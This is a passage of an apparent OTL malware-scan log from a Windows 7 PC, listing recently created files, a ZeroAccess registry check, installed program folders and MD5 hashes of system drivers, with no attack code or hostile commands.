() -- C:\Windows\tasks\Start Registry Reviver for hp-PC@houdaelgo(logon).job [2015/04/05 21:46:45 | 2076,987,391 | -HS- | M] () -- C:\hiberfil.sys [2015/04/03 12:09:25 | 000,002,350 | ---- | M] () -- C:\Users\hp\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk [2015/03/28 14:24:05 | 000,946,381 | ---- | M] () -- C:\Users\hp\Desktop\Casio_FX-991ES.pdf [2015/03/27 15:49:04 | 000,058,391 | ---- | M] () -- C:\Users\hp\Desktop\11070021_958617760816473_1700118130639276690_n.jpg [2015/03/27 13:59:19 | 002,070,509 | ---- | M] () -- C:\Users\hp\Desktop\Exercices_et_problemes_d-_Analyse_numerique_avec_MATLAB_-Dunod-.pdf [2015/03/27 13:09:38 | 000,095,080 | ---- | M] () -- C:\Users\hp\Desktop\961698_1636504613248965_604672353_n.jpg [2015/03/21 22:53:29 | 000,068,586 | ---- | M] () -- C:\Users\hp\Desktop\10476985_351085648414910_4840356017823017321_n.jpg [2015/03/15 23:32:57 | 000,000,973 | ---- | M] () -- C:\Users\hp\Desktop\Algobox.lnk [2015/03/14 14:31:56 | 000,001,123 | ---- | M] () -- C:\Users\hp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2015/03/14 01:27:11 | 000,888,266 | ---- | M] () -- C:\Users\hp\Desktop\yzpAF40.jpg [2015/03/12 10:21:49 | 005,069,904 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT [2015/03/08 15:53:15 | 000,001,187 | ---- | M] () -- C:\Users\hp\Application Data\Microsoft\Internet Explorer\Quick Launch\Yahoo! Messenger.lnk [2015/03/08 15:53:15 | 000,001,163 | ---- | M] () -- C:\Users\Public\Desktop\Yahoo! Messenger.lnk [color=#E56717]========== Files Created - No Company Name ==========[/color] [2015/04/06 18:11:51 | 000,000,512 | ---- | C] () -- C:\PhysicalMBR.bin [2015/03/28 14:24:05 | 000,946,381 | ---- | C] () -- C:\Users\hp\Desktop\Casio_FX-991ES.pdf [2015/03/27 15:49:04 | 000,058,391 | ---- | C] () -- C:\Users\hp\Desktop\11070021_958617760816473_1700118130639276690_n.jpg [2015/03/27 13:59:19 | 002,070,509 | ---- | C] () -- C:\Users\hp\Desktop\Exercices_et_problemes_d-_Analyse_numerique_avec_MATLAB_-Dunod-.pdf [2015/03/27 13:09:37 | 000,095,080 | ---- | C] () -- C:\Users\hp\Desktop\961698_1636504613248965_604672353_n.jpg [2015/03/21 22:53:27 | 000,068,586 | ---- | C] () -- C:\Users\hp\Desktop\10476985_351085648414910_4840356017823017321_n.jpg [2015/03/15 23:32:57 | 000,000,973 | ---- | C] () -- C:\Users\hp\Desktop\Algobox.lnk [2015/03/14 01:27:10 | 000,888,266 | ---- | C] () -- C:\Users\hp\Desktop\yzpAF40.jpg [2015/03/08 15:53:15 | 000,001,187 | ---- | C] () -- C:\Users\hp\Application Data\Microsoft\Internet Explorer\Quick Launch\Yahoo! Messenger.lnk [2015/03/08 15:53:15 | 000,001,163 | ---- | C] () -- C:\Users\Public\Desktop\Yahoo! Messenger.lnk [2015/02/17 20:07:20 | 001,367,758 | ---- | C] () -- C:\Users\hp\20150215_154152 - Copie.jpg [2015/02/17 20:06:55 | 001,443,088 | ---- | C] () -- C:\Users\hp\20150215_154151.jpg [2015/02/17 20:06:29 | 001,443,088 | ---- | C] () -- C:\Users\hp\20150215_154151 - Copie.jpg [2015/02/17 20:05:57 | 001,455,521 | ---- | C] () -- C:\Users\hp\20150215_154150.jpg [2015/02/17 20:05:30 | 001,455,521 | ---- | C] () -- C:\Users\hp\20150215_154150 - Copie.jpg [2015/02/17 20:05:07 | 001,260,650 | ---- | C] () -- C:\Users\hp\20150215_154141.jpg [2015/02/17 20:04:46 | 001,237,588 | ---- | C] () -- C:\Users\hp\20150215_154140.jpg [2015/02/17 20:04:24 | 001,237,588 | ---- | C] () -- C:\Users\hp\20150215_154140 - Copie.jpg [2015/02/17 20:04:02 | 001,184,264 | ---- | C] () -- C:\Users\hp\20150215_154128.jpg [2015/02/17 20:03:41 | 001,206,095 | ---- | C] () -- C:\Users\hp\20150215_154128 - Copie.jpg [2015/02/17 20:03:21 | 001,132,302 | ---- | C] () -- C:\Users\hp\20150215_154127.jpg [2015/02/17 20:03:01 | 001,155,367 | ---- | C] () -- C:\Users\hp\20150215_154127 - Copie.jpg [2015/02/17 20:02:37 | 001,402,546 | ---- | C] () -- C:\Users\hp\20150215_154126.jpg [2015/02/17 20:02:15 | 001,322,763 | ---- | C] () -- C:\Users\hp\20150215_154125.jpg [2015/02/17 20:01:52 | 001,334,811 | ---- | C] () -- C:\Users\hp\20150215_154124.jpg [2015/02/17 20:01:30 | 001,248,133 | ---- | C] () -- C:\Users\hp\20150215_154123.jpg [2015/02/17 20:01:09 | 001,217,781 | ---- | C] () -- C:\Users\hp\20150215_154122.jpg [2015/02/17 20:00:53 | 000,885,222 | ---- | C] () -- C:\Users\hp\20150215_152750.jpg [2015/02/17 20:00:38 | 000,824,084 | ---- | C] () -- C:\Users\hp\20150215_152746.jpg [2015/02/17 20:00:16 | 001,271,310 | ---- | C] () -- C:\Users\hp\20150215_152732.jpg [2015/02/17 19:59:51 | 001,317,445 | ---- | C] () -- C:\Users\hp\20150215_152720.jpg [2015/02/17 19:59:31 | 000,796,774 | ---- | C] () -- C:\Users\hp\20150215_152713.jpg [2015/02/17 19:59:08 | 001,241,768 | ---- | C] () -- C:\Users\hp\20150215_152709.jpg [2015/02/17 19:58:44 | 001,261,386 | ---- | C] () -- C:\Users\hp\20150215_152708.jpg [2015/02/17 19:58:17 | 001,266,627 | ---- | C] () -- C:\Users\hp\20150215_152707.jpg [2015/02/17 19:57:53 | 001,255,146 | ---- | C] () -- C:\Users\hp\20150215_152706.jpg [2015/02/17 19:57:17 | 001,052,753 | ---- | C] () -- C:\Users\hp\20150209_160211.jpg [2015/02/17 19:56:47 | 001,665,992 | ---- | C] () -- C:\Users\hp\20150209_143244.jpg [2015/02/17 19:56:10 | 001,842,856 | ---- | C] () -- C:\Users\hp\20150209_143242.jpg [2015/02/17 19:55:33 | 001,827,870 | ---- | C] () -- C:\Users\hp\20150209_143240.jpg [2015/02/17 19:54:55 | 001,926,604 | ---- | C] () -- C:\Users\hp\20150209_142844.jpg [2015/02/17 19:54:31 | 001,208,730 | ---- | C] () -- C:\Users\hp\20150209_142643.jpg [2015/02/17 19:54:06 | 001,230,898 | ---- | C] () -- C:\Users\hp\20150209_142642.jpg [2015/02/17 19:53:41 | 001,283,264 | ---- | C] () -- C:\Users\hp\20150209_142630.jpg [2015/02/17 19:53:16 | 001,289,137 | ---- | C] () -- C:\Users\hp\20150209_142628.jpg [2015/02/17 19:52:49 | 001,355,106 | ---- | C] () -- C:\Users\hp\20150209_142559.jpg [2015/02/17 19:52:22 | 001,339,128 | ---- | C] () -- C:\Users\hp\20150209_142557.jpg [2015/02/17 19:51:51 | 001,582,322 | ---- | C] () -- C:\Users\hp\20150209_142454.jpg [2015/02/17 19:51:35 | 000,843,368 | ---- | C] () -- C:\Users\hp\20150209_142450_010.jpg [2015/02/17 19:51:17 | 000,854,058 | ---- | C] () -- C:\Users\hp\20150209_142450_009.jpg [2015/02/17 19:50:58 | 000,869,876 | ---- | C] () -- C:\Users\hp\20150209_142450_008.jpg [2015/02/17 19:50:40 | 000,860,500 | ---- | C] () -- C:\Users\hp\20150209_142450_007.jpg [2015/02/17 19:50:24 | 000,866,860 | ---- | C] () -- C:\Users\hp\20150209_142450_006.jpg [2015/02/17 19:50:06 | 000,908,444 | ---- | C] () -- C:\Users\hp\20150209_142450_005.jpg [2015/02/17 19:49:48 | 000,914,694 | ---- | C] () -- C:\Users\hp\20150209_142450_004.jpg [2015/02/17 19:49:28 | 000,927,866 | ---- | C] () -- C:\Users\hp\20150209_142450_003.jpg [2015/02/17 19:49:10 | 000,912,944 | ---- | C] () -- C:\Users\hp\20150209_142436.jpg [2015/02/17 19:48:45 | 001,222,138 | ---- | C] () -- C:\Users\hp\20150203_230816.jpg [2015/02/17 19:48:23 | 001,164,862 | ---- | C] () -- C:\Users\hp\20150203_230217.jpg [2015/02/17 19:47:54 | 001,350,200 | ---- | C] () -- C:\Users\hp\20150203_230152.jpg [2015/02/17 19:47:27 | 001,376,124 | ---- | C] () -- C:\Users\hp\20150203_230146.jpg [2015/02/17 19:46:55 | 001,767,192 | ---- | C] () -- C:\Users\hp\20150201_134139.jpg [2015/02/17 19:46:11 | 001,714,042 | ---- | C] () -- C:\Users\hp\20150201_134134.jpg [2015/02/17 19:45:23 | 001,634,996 | ---- | C] () -- C:\Users\hp\20150201_134121.jpg [2015/02/17 19:44:42 | 001,364,818 | ---- | C] () -- C:\Users\hp\20150201_122142.jpg [2015/02/17 19:43:55 | 001,375,128 | ---- | C] () -- C:\Users\hp\20150201_122140.jpg [2015/02/17 19:43:00 | 001,418,076 | ---- | C] () -- C:\Users\hp\20150201_122138.jpg [2015/02/17 19:42:23 | 001,338,002 | ---- | C] () -- C:\Users\hp\20150201_122137.jpg [2015/02/17 19:41:49 | 001,312,884 | ---- | C] () -- C:\Users\hp\20150201_122135.jpg [2015/02/17 19:41:13 | 001,424,380 | ---- | C] () -- C:\Users\hp\20150201_122131.jpg [2015/02/17 19:40:41 | 001,328,970 | ---- | C] () -- C:\Users\hp\20150201_122130.jpg [2015/02/17 19:40:05 | 001,503,678 | ---- | C] () -- C:\Users\hp\20150131_193802.jpg [2015/02/17 19:39:37 | 001,285,794 | ---- | C] () -- C:\Users\hp\20150131_151643.jpg [2015/02/17 19:39:11 | 001,236,604 | ---- | C] () -- C:\Users\hp\20150131_151642.jpg [2015/02/17 19:38:41 | 001,367,768 | ---- | C] () -- C:\Users\hp\20150215_154152.jpg [2015/02/17 01:45:49 | 002,072,816 | ---- | C] () -- C:\Users\hp\20150201_133906.jpg [2015/02/17 01:45:12 | 002,058,918 | ---- | C] () -- C:\Users\hp\20150201_133905.jpg [2015/02/17 01:44:35 | 002,041,812 | ---- | C] () -- C:\Users\hp\20150201_133904.jpg [2015/02/17 01:44:00 | 001,969,610 | ---- | C] () -- C:\Users\hp\20150201_133903.jpg [2015/02/17 01:43:25 | 001,962,024 | ---- | C] () -- C:\Users\hp\20150201_133902.jpg [2015/02/17 01:42:50 | 001,943,080 | ---- | C] () -- C:\Users\hp\20150201_133901.jpg [2015/02/17 01:42:03 | 002,641,602 | ---- | C] () -- C:\Users\hp\20150131_161012.jpg [2015/02/17 01:41:16 | 002,628,104 | ---- | C] () -- C:\Users\hp\20150131_161012(0).jpg [2015/02/17 01:40:30 | 002,604,178 | ---- | C] () -- C:\Users\hp\20150131_161011.jpg [2015/02/17 01:39:45 | 002,649,364 | ---- | C] () -- C:\Users\hp\20150131_161011(0).jpg [2015/02/17 01:38:55 | 002,800,940 | ---- | C] () -- C:\Users\hp\20150131_161008.jpg [2015/02/17 01:38:08 | 002,738,900 | ---- | C] () -- C:\Users\hp\20150131_161007.jpg [2015/02/17 01:37:19 | 002,756,874 | ---- | C] () -- C:\Users\hp\20150131_161007(0).jpg [2015/02/17 01:36:33 | 002,709,724 | ---- | C] () -- C:\Users\hp\20150131_161006.jpg [2015/02/17 01:35:54 | 002,251,624 | ---- | C] () -- C:\Users\hp\20150131_160958.jpg [2015/02/17 01:35:10 | 002,324,718 | ---- | C] () -- C:\Users\hp\20150131_160957.jpg [2015/02/17 01:34:28 | 002,278,810 | ---- | C] () -- C:\Users\hp\20150131_160957(0).jpg [2015/02/17 01:33:42 | 002,341,988 | ---- | C] () -- C:\Users\hp\20150131_160956.jpg [2015/02/17 01:32:55 | 002,316,592 | ---- | C] () -- C:\Users\hp\20150131_160955.jpg [2015/02/17 01:32:06 | 002,711,782 | ---- | C] () -- C:\Users\hp\20150131_160739.jpg [2015/02/17 01:30:55 | 002,942,130 | ---- | C] () -- C:\Users\hp\20150131_160737.jpg [2015/02/17 01:29:34 | 002,973,622 | ---- | C] () -- C:\Users\hp\20150131_160737(0).jpg [2015/02/17 01:28:40 | 001,671,317 | ---- | C] () -- C:\Users\hp\20150131_160736.jpg [2015/02/17 01:27:48 | 002,952,606 | ---- | C] () -- C:\Users\hp\20150131_160735.jpg [2015/02/17 01:26:45 | 002,952,160 | ---- | C] () -- C:\Users\hp\20150131_160735(0).jpg [2015/02/17 01:25:44 | 002,843,052 | ---- | C] () -- C:\Users\hp\20150131_160733.jpg [2015/02/17 01:24:42 | 002,813,370 | ---- | C] () -- C:\Users\hp\20150131_160732.jpg [2015/02/17 01:23:46 | 001,656,331 | ---- | C] () -- C:\Users\hp\20150131_160728.jpg [2015/02/17 01:22:55 | 002,493,226 | ---- | C] () -- C:\Users\hp\20150131_160722.jpg [2015/02/17 01:22:03 | 002,471,110 | ---- | C] () -- C:\Users\hp\20150131_160721.jpg [2015/02/17 01:21:17 | 002,465,336 | ---- | C] () -- C:\Users\hp\20150131_160720.jpg [2015/02/17 01:20:19 | 002,397,444 | ---- | C] () -- C:\Users\hp\20150131_160719.jpg [2015/02/17 01:19:04 | 002,495,280 | ---- | C] () -- C:\Users\hp\20150131_160716.jpg [2015/02/17 01:18:00 | 001,398,004 | ---- | C] () -- C:\Users\hp\20150131_160659.jpg [2015/02/17 01:16:42 | 001,342,243 | ---- | C] () -- C:\Users\hp\20150131_160658.jpg [2015/02/17 01:15:30 | 002,384,694 | ---- | C] () -- C:\Users\hp\20150131_160658(0).jpg [2015/02/17 01:14:45 | 001,692,692 | ---- | C] () -- C:\Users\hp\20150131_160653.jpg [2015/02/17 01:14:05 | 001,000,728 | ---- | C] () -- C:\Users\hp\20150131_160652.jpg [2015/02/17 01:13:41 | 001,206,206 | ---- | C] () -- C:\Users\hp\20150131_160651.jpg [2015/02/17 01:12:10 | 001,627,187 | ---- | C] () -- C:\Users\hp\20150131_160642.jpg [2015/02/17 01:10:58 | 002,923,462 | ---- | C] () -- C:\Users\hp\20150131_160641.jpg [2015/02/17 01:10:13 | 002,470,848 | ---- | C] () -- C:\Users\hp\20150131_160637.jpg [2015/02/17 01:09:30 | 002,512,190 | ---- | C] () -- C:\Users\hp\20150131_160637(0).jpg [2015/02/17 01:08:46 | 002,485,890 | ---- | C] () -- C:\Users\hp\20150131_160636.jpg [2015/02/17 01:08:07 | 002,247,492 | ---- | C] () -- C:\Users\hp\20150131_144250.jpg [2015/02/17 01:07:29 | 002,195,877 | ---- | C] () -- C:\Users\hp\20150131_144248.jpg [2015/02/17 01:06:41 | 002,184,470 | ---- | C] () -- C:\Users\hp\20150131_144246.jpg [2015/02/17 01:05:59 | 002,026,230 | ---- | C] () -- C:\Users\hp\20150131_144229.jpg [2015/02/17 01:05:17 | 002,205,922 | ---- | C] () -- C:\Users\hp\20150131_144227.jpg [2015/02/17 01:04:36 | 002,135,006 | ---- | C] () -- C:\Users\hp\20150131_144226.jpg [2015/02/17 01:03:59 | 001,896,562 | ---- | C] () -- C:\Users\hp\20150131_144224.jpg [2015/02/17 01:03:17 | 001,880,622 | ---- | C] () -- C:\Users\hp\20150131_144222.jpg [2015/02/17 01:02:55 | 001,178,706 | ---- | C] () -- C:\Users\hp\20150131_144221.jpg [2015/02/17 01:02:35 | 001,125,166 | ---- | C] () -- C:\Users\hp\20150131_095319.jpg [2015/02/17 01:02:10 | 000,999,520 | ---- | C] () -- C:\Users\hp\20150131_094650.jpg [2015/02/17 01:01:35 | 002,002,868 | ---- | C] () -- C:\Users\hp\20150201_133909(0).jpg [2015/01/22 21:48:52 | 000,281,688 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe [2015/01/22 21:48:51 | 000,076,888 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe [2015/01/17 14:48:45 | 000,405,881 | ---- | C] () -- C:\Windows\KJ.exe [2015/01/08 09:19:00 | 000,030,213 | ---- | C] () -- C:\Users\hp\untitled4_MAS.bak [2015/01/05 00:35:07 | 000,056,238 | ---- | C] () -- C:\Users\hp\untitled5_MAS.bak [2014/12/25 16:49:22 | 000,023,262 | ---- | C] () -- C:\Users\hp\untitled7_MAS.bak [2014/12/18 15:42:39 | 000,024,214 | ---- | C] () -- C:\Users\hp\untitled6_MAS.bak [2014/12/03 00:54:38 | 003,190,168 | R--- | C] () -- C:\Windows\SysWow64\pb.exe [2014/10/03 22:58:16 | 000,000,426 | RHS- | C] () -- C:\ProgramData\ntuser.pol [2014/09/05 03:19:54 | 002,190,220 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI [2014/09/03 22:19:31 | 000,650,752 | ---- | C] () -- C:\Windows\SysWow64\xvidcore.dll [2014/09/03 22:19:31 | 000,243,200 | ---- | C] () -- C:\Windows\SysWow64\xvidvfw.dll [2014/09/03 22:19:30 | 000,178,688 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll [2014/09/03 22:19:28 | 000,079,872 | ---- | C] () -- C:\Windows\SysWow64\ff_vfw.dll [2014/09/03 22:08:17 | 000,026,464 | ---- | C] () -- C:\Windows\snuvcdsm.exe [2014/09/03 22:08:14 | 000,015,497 | ---- | C] () -- C:\Windows\snp2uvc.ini [2014/09/03 22:06:12 | 000,077,312 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll [2014/09/03 22:05:53 | 000,963,452 | ---- | C] () -- C:\Windows\SysWow64\igcodeckrng600.bin [2014/09/03 22:05:53 | 000,272,928 | ---- | C] () -- C:\Windows\SysWow64\igvpkrng600.bin [2014/04/30 19:47:48 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\issacapi_bs-2.3.dll [2014/04/30 19:47:48 | 000,065,536 | ---- | C] () -- C:\Windows\SysWow64\issacapi_pe-2.3.dll [2014/04/30 19:47:48 | 000,057,344 | ---- | C] () -- C:\Windows\SysWow64\issacapi_se-2.3.dll [2014/04/30 19:47:46 | 000,974,848 | ---- | C] () -- C:\Windows\SysWow64\cis-2.4.dll [color=#E56717]========== ZeroAccess Check ==========[/color] [2009/07/14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 "" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 06:22:33 | 014,177,280 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 06:26:18 | 012,875,264 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 04:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] [color=#E56717]========== LOP Check ==========[/color] [color=#E56717]========== Purity Check ==========[/color] [color=#E56717]========== Custom Scans ==========[/color] [color=#A23BEC]< %SYSTEMDRIVE%\*.* >[/color] [2015/04/05 21:46:45 | 2076,987,391 | -HS- | M] () -- C:\hiberfil.sys [2015/04/05 21:46:50 | 4200,972,287 | -HS- | M] () -- C:\pagefile.sys [2015/04/06 18:11:51 | 000,000,512 | ---- | M] () -- C:\PhysicalMBR.bin [color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color] [color=#A23BEC]< %PROGRAMFILES%\*.* >[/color] [2009/07/14 05:54:24 | 000,000,174 | -HS- | M] () -- C:\Program Files (x86)\desktop.ini [color=#A23BEC]< %PROGRAMFILES%\*. >[/color] [2014/12/07 11:19:56 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Adobe [2015/03/15 23:32:57 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Algobox [2015/01/20 15:14:12 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Autodesk [2014/09/03 22:24:43 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\CCleaner [2015/01/16 15:12:35 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\COED11 [2015/03/11 19:22:21 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files [2014/11/27 16:00:41 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\DjVuLibre [2014/11/21 23:09:44 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\DriverToolkit [2014/09/12 13:16:21 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Evernote [2015/01/18 21:48:50 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\GGoSave [2014/11/22 00:19:53 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Google [2014/10/25 01:01:52 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\InstallShield Installation Information [2014/09/03 22:07:10 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Intel [2015/03/12 10:19:48 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Internet Explorer [2014/10/10 20:00:18 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Java [2014/09/03 22:19:44 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\K-Lite Codec Pack [2014/09/18 16:37:13 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft [2014/09/03 22:19:08 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Analysis Services [2014/09/03 22:21:28 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Office [2015/02/12 04:02:06 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Security Client [2014/09/03 22:21:28 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft SQL Server Compact Edition [2014/09/03 22:21:28 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Sync Framework [2014/09/03 22:21:43 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Synchronization Services [2014/09/03 22:19:56 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Visual Studio 8 [2014/09/05 03:19:05 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft.NET [2015/03/25 16:44:34 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Mozilla Firefox [2015/03/26 20:11:06 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Mozilla Maintenance Service [2014/09/03 22:21:58 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\MSBuild [2014/11/26 12:02:05 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\MyFree Codec [2015/01/25 02:33:56 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\R.G. Mechanics [2009/07/14 06:32:38 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Reference Assemblies [2014/10/25 01:01:53 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Samsung [2014/11/27 15:59:36 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\STDU Viewer [2014/12/28 23:28:24 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Steam [2009/07/14 05:57:06 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Uninstall Information [2014/09/03 22:21:03 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\VideoLAN [2013/12/08 16:48:13 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Defender [2013/12/08 16:48:14 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Mail [2015/03/12 10:19:52 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Media Player [2009/07/14 06:32:38 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows NT [2013/12/08 16:48:13 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Photo Viewer [2010/11/21 04:31:38 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Portable Devices [2013/12/08 16:48:14 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Sidebar [2014/09/03 22:20:26 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\WinRAR [2015/03/08 15:53:13 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Yahoo! [2015/01/18 21:48:48 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\YouttubeAddBlOckee [color=#A23BEC]< MD5 for: AGP440.SYS >[/color] [2009/07/14 02:52:21 | 000,061,008 | ---- | M] (Microsoft Corporation) MD5=608C14DBA7299D8CB6ED035A68A15799 -- C:\Windows\SysNative\drivers\AGP440.sys [2009/07/14 02:52:21 | 000,061,008 | ---- | M] (Microsoft Corporation) MD5=608C14DBA7299D8CB6ED035A68A15799 -- C:\Windows\SysNative\DriverStore\FileRepository\machine.inf_amd64_neutral_a2f120466549d68b\AGP440.sys [2009/07/14 02:52:21 | 000,061,008 | ---- | M] (Microsoft Corporation) MD5=608C14DBA7299D8CB6ED035A68A15799 -- C:\Windows\winsxs\amd64_machine.inf_31bf3856ad364e35_6.1.7601.17514_none_1838f2aad55063bb\AGP440.sys [color=#A23BEC]< MD5 for: APPMGMTS.DLL >[/color] [2009/07/14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) MD5=4ABA3E75A76195A3E38ED2766C962899 -- C:\Windows\SysNative\appmgmts.dll [2009/07/14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) MD5=4ABA3E75A76195A3E38ED2766C962899 -- C:\Windows\winsxs\amd64_microsoft-windows-g..oftwareinstallation_31bf3856ad364e35_6.1.7600.16385_none_ddc3da0b75baa7e0\appmgmts.dll [2009/07/14 02:14:53 | 000,149,504 | ---- | M] (Microsoft Corporation) MD5=A45D184DF6A8803DA13A0B329517A64A -- C:\Windows\SysWOW64\appmgmts.dll [2009/07/14 02:14:53 | 000,149,504 | ---- | M] (Microsoft Corporation) MD5=A45D184DF6A8803DA13A0B329517A64A -- C:\Windows\winsxs\wow64_microsoft-windows-g..oftwareinstallation_31bf3856ad364e35_6.1.7600.16385_none_e818845daa1b69db\appmgmts.dll [color=#A23BEC]< MD5 for: ATAPI.SYS >[/color] [2009/07/14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\drivers\atapi.sys [2009/07/14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_neutral_552ea5111ec825a6\atapi.sys [2009/07/14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_neutral_aad30bdeec04ea5e\atapi.sys [2009/07/14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_3b5e2d89382958dd\atapi.sys [2009/07/14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.18231_none_3b457059383c66e6\atapi.sys [2009/07/14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.22414_none_3be7afc0514717fa\atapi.sys [color=#A23BEC]< MD5 for: AUTOCHK.EXE >[/color] [2010/11/21 04:24:27 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=3B536A8BEC3B4F23FFDFD78B11A2AB93 -- C:\Windows\SysNative\autochk.exe [2010/11/21 04:24:27 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=3B536A8BEC3B4F23FFDFD78B11A2AB93 -- C:\Windows\winsxs\amd64_microsoft-windows-autochk_31bf3856ad364e35_6.1.7601.17514_none_4019f2b8d860ad30\autochk.exe [2010/11/21 04:23:53 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=F88A52EB62019D6A62FDD9E08034DBD8 -- C:\Windows\SysWOW64\autochk.exe [2010/11/21 04:23:53 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=F88A52EB62019D6A62FDD9E08034DBD8 -- 